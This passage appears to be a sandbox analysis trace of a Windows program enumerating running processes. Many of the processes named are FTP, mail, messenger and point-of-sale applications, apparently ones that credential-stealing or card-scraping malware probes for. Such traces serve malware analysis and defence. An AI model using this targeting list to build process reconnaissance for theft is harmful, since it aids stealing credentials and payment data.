(hObject=0x1018) returned 1 [0261.164] Sleep (dwMilliseconds=0x64) [0261.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0261.319] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.321] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0261.322] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0261.327] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.329] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0261.330] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0261.332] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0261.333] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0261.334] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0261.336] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.337] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.339] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0261.340] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.341] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.343] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.344] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.345] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.347] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.348] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.350] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0261.351] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0261.352] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0261.353] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.365] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0261.367] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0261.368] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0261.373] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0261.374] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0261.376] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0261.378] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0261.380] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.382] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0261.384] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0261.386] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0261.388] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0261.389] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0261.390] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0261.392] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0261.393] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0261.395] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0261.396] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0261.397] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0261.399] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0261.400] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0261.553] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0261.564] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0261.566] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0261.568] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0261.570] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0261.572] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0261.577] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0261.579] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0261.581] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0261.583] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0261.585] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0261.587] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0261.592] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0261.594] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0261.596] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0261.599] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0261.601] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0261.603] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0261.721] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0261.724] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0261.726] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0261.728] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0261.734] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0261.736] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0261.737] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0261.740] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0261.742] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0261.744] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0261.748] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0261.749] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0261.751] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0261.752] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0261.754] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0261.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0261.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0261.758] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0261.760] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0261.845] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0261.846] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0261.848] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, 